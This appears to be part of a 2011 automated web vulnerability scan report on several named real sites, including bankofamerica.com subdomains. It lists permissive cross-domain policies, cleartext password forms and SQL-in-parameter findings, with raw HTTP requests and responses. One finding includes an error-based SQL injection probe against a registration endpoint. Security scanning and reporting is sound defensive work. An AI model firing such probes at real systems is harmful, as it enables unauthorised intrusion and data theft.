Last-Modified: Thu, 06 Aug 2009 19:44:15 GMT
ETag: "10b-4707e583681c0"
Accept-Ranges: bytes
Content-Length: 267
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-requ
...[SNIP]...

5.13. http://shots.snap.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: shots.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Last-Modified: Thu, 06 Aug 2009 19:44:15 GMT
ETag: "10b-4707e583681c0"
Accept-Ranges: bytes
Content-Length: 267
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-requ
...[SNIP]...

5.14. http://sofa.bankofamerica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sofa.bankofamerica.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:03 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "204760-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=995
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.15. http://tc.bankofamerica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tc.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tc.bankofamerica.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:26:10 GMT
Connection: Keep-Alive
Content-Type: application/xml; charset=ISO-8859-1
Content-Length: 79
Last-Modified: Tue, 26 Apr 2011 12:26:10 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:26:10 GMT;path=/;domain=bankofamerica.com

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.16. https://tc.bankofamerica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tc.bankofamerica.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:45:45 GMT
Connection: Keep-Alive
Content-Type: application/xml; charset=ISO-8859-1
Content-Length: 79
Last-Modified: Tue, 26 Apr 2011 12:45:45 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:45:45 GMT;path=/;domain=bankofamerica.com

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.17. http://www.afreshbunch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.afreshbunch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 16:55:37 GMT
Accept-Ranges: bytes
ETag: "659d66e23f4c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:00 GMT
Connection: close
Content-Length: 223

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" />


...[SNIP]...

5.18. http://realestatecenter.bankofamerica.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://realestatecenter.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: realestatecenter.bankofamerica.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 1546
Content-Type: text/xml
Last-Modified: Wed, 13 Apr 2011 20:18:40 GMT
Accept-Ranges: bytes
ETag: "e960c3fa17facb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMo TAIo OUR STP COM INT STA PRE"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:44:49 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   
   <site-control permitted-cross-domain-policies="master-only" />
   
   <allow-access-from domain="listingimages.fnistools.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.woodsbros.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbshome.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.prudentialcal.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.edinarealty.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edinaimages.fnistools.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edinarealtymarketing.com" />

<allow-access-from domain="*.rtso.com" />

<allow-access-from domain="*.Longrealtyonline.com" />
<allow-access-from domain="*.Longnet.net" />
<allow-access-from domain="*.Youtube.com" />
<allow-access-from domain="*.Mytransactionnow.com" />
<allow-access-from domain="*.Longmortgage.com" />
<allow-access-from domain="*.Longtitle.com" />
<allow-access-from domain="*.Longinsurancegroup.com" />
<allow-access-from domain="*.Longrealtycares.com" />
<allow-access-from domain="*.Thesmarterwaytosell.com" />

<allow-access-from domain="*.video.reeceandnichols.com" />
<allow-access-from domain="*.today.reeceandnichols.com" />
...[SNIP]...

5.19. https://secure.opinionlab.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.opinionlab.com

Response

HTTP/1.1 200 OK
Age: 1
Date: Tue, 26 Apr 2011 12:41:01 GMT
Connection: Keep-Alive
Via: YouBeenCached
ETag: "d09b92e3ff85c81:2b6f"
Content-Length: 97
Content-Type: text/xml
Last-Modified: Fri, 14 Mar 2008 18:19:06 GMT
Accept-Ranges: bytes

...<cross-domain-policy>
   <allow-access-from domain="*.opinionlab.com"/>
</cross-domain-policy>

5.20. http://stats.wordpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 01:20:51 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "249-4c227139-3be9c0"
Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Content-Length: 585

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 3 instances of this issue:


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Tue, 26 Apr 2011 11:34:22 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://firstdata.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: firstdata.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:30 GMT
Server: Omniture DC/2.0.0
xserver: www389
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.3. http://stats.wordpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 01:20:51 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "135-4c7e718e-78124"
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Content-Length: 309

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

7. Cleartext submission of password  previous  next
There are 6 instances of this issue:


7.1. http://afreshbunch.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.10.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:05:01 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:06:00 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<td valign="top" class="element-row1">
                   <form method="POST" action="/?page=login&cmd=start_reg" name="register_form" id="geoform" language="JavaScript">
                   <fieldset>
...[SNIP]...
<div class="field"><input maxLength="12" name="password" size="20" type="password"></div>
...[SNIP]...
<div class="field"><input maxLength="12" name="password1" size="20" type="password"></div>
...[SNIP]...

7.2. http://afreshbunch.com/forums/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forums/?page=t&sa=mine HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16260
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:04:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:05:52 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<div class="element-inner-div">


<form method="POST" name="login_form" action="/?page=login&cmd=passme">


<p>
...[SNIP]...
<td width="65%" nowrap class="element-row1-inner">
    <input TYPE="password" NAME="password" size="30"></td>
...[SNIP]...

7.3. http://learn.bridgefront.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=F135E1A487FF7E17C2D48B02FB00CAEA; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34161


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...
<td style="height: 134px">
<form name="loginform" id="loginform" method="post" action="/logincontroller" onsubmit="return specialValidation()">
                <input type="hidden" name="forwardpage" id="forwardpage" value="lm_login.jsp">
...[SNIP]...
<td width="35%"><input name="replace1_ul_" id="replace1_ul_" type="password" class="TxtField" style="width: 204px" maxlength="50"></td>
...[SNIP]...

7.4. http://learn.bridgefront.com/login.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /login.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.jsp?reason=keyfailed HTTP/1.1
Referer: http://learn.bridgefront.com/KeyRegister
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.bridgefront.com
Cookie: JSESSIONID=1B3FB576C860FF50C5478C31E0BD27CE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:35:22 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34227


<html>
<head>

<title>BridgeFront | LMS | Login</title>
<link href="/lscheme/default/css/Learner.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/LearnerSideJsFun
...[SNIP]...
<td style="height: 134px">
<form name="loginform" id="loginform" method="post" action="/logincontroller" onsubmit="return specialValidation()">
                <input type="hidden" name="forwardpage" id="forwardpage" value="lm_login.jsp">
...[SNIP]...
<td width="35%"><input name="replace1_ul_" id="replace1_ul_" type="password" class="TxtField" style="width: 204px" maxlength="50"></td>
...[SNIP]...

7.5. http://login.sisna.com/login_multiple/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:44:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2742
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- Login Form -->
<form action="/login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2" method="post" name="login">
<table id="login" class="tbl_login" align="center">
...[SNIP]...
<td><input name="usernamepword" type="password" class="txt"></td>
...[SNIP]...

7.6. http://www.afreshbunch.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.1.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:43:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:37 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<td valign="top" class="element-row1">
                   <form method="POST" action="/?page=login&cmd=start_reg" name="register_form" id="geoform" language="JavaScript">
                   <fieldset>
...[SNIP]...
<div class="field"><input maxLength="12" name="password" size="20" type="password"></div>
...[SNIP]...
<div class="field"><input maxLength="12" name="password1" size="20" type="password"></div>
...[SNIP]...

8. SQL statement in request parameter  previous  next
There are 3 instances of this issue:


8.1. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://account.snap.com
Path:   /signup.php

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 15403

terms=Snap+Shots+Terms+of+Use+Policy%0D%0A%0D%0APLEASE+READ+VERY+CAREFULLY+THESE+TERMS+OF+USE+FOR+THE+SNAP+SHOTS+PROGRAM%2C+INCLUDING+THE+SNAP+SHARES+FEATURES%2C+BEFORE+REGISTERING.+PARTICIPATION+IN+T
...[SNIP]...
Program.%0D%0A%0D%0A2.+Program+Rules+and+Restrictions.+The+Program+is+designed+to+allow+You+to+make+some+choices+about+how+the+Program+will+appear+on+Your+Web+Site.+The+Program+will+also+allow+you+to+select+some+of+the+ads+to+serve+on+Snap+Shots+from+the+list+of+available+choices%2C+if+you+choose+to+Participate+in+Snap+Shares.+Snap+retains+the+right%2C+in+its+sole+discretion%2C+to+set+the+rules+for+all+ad+runs+%28and+of+course%2C+we+will+attempt+
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:04:11 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...

8.2. http://learn.bridgefront.com/KeyRegister  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://learn.bridgefront.com
Path:   /KeyRegister

Request

POST /KeyRegister HTTP/1.1
Referer: http://learn.bridgefront.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: learn.bridgefront.com
Cookie: JSESSIONID=1B3FB576C860FF50C5478C31E0BD27CE
Accept-Encoding: gzip, deflate
Content-Length: 191

replace2_ul_=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&submit=Register

Response

HTTP/1.1 302 Moved Temporarily
